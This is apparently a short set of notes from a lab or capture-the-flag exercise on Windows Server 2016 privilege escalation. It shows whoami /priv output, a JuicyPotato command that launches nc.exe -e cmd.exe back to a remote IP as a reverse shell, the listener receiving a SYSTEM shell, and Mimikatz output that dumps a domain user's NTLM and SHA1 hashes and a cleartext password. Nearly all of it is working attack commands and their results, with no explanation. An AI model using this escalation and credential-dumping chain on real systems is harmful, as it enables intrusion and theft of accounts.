3 privesc

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

OS Name: Microsoft Windows Server 2016 Standard

Using JuicyPotato

https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
# SeImpersonatePrivilege; SeCreateGlobalPrivilege
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c PATH\nc.exe -e cmd.exe 10.2.74.151 9999" -t *

$ rlwrap nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.14.34] from (UNKNOWN) [10.10.10.29] 53225
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

whoami
whoami
nt authority\system

# loaded Mimikatz and extracted password for Sandra

Authentication Id : 0 ; 294058 (00000000:00047caa)
Session           : Interactive from 1
User Name         : sandra
Domain            : MEGACORP
Logon Server      : PATHFINDER
Logon Time        : 4/24/2021 8:42:29 PM
SID               : S-1-5-21-1035856440-4137329016-3276773158-1105
	msv :	
	 [00000003] Primary
	 * Username : sandra
	 * Domain   : MEGACORP
	 * NTLM     : 29ab86c5c4d2aab957763e5c1720486d
	 * SHA1     : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38
	 * DPAPI    : f4c73b3f07c4f309ebf086644254bcbc
	tspkg :	
	wdigest :	
	 * Username : sandra
	 * Domain   : MEGACORP
	 * Password : (null)
	kerberos :	
	 * Username : sandra
	 * Domain   : MEGACORP.LOCAL
	 * Password : Password1234!

Last updated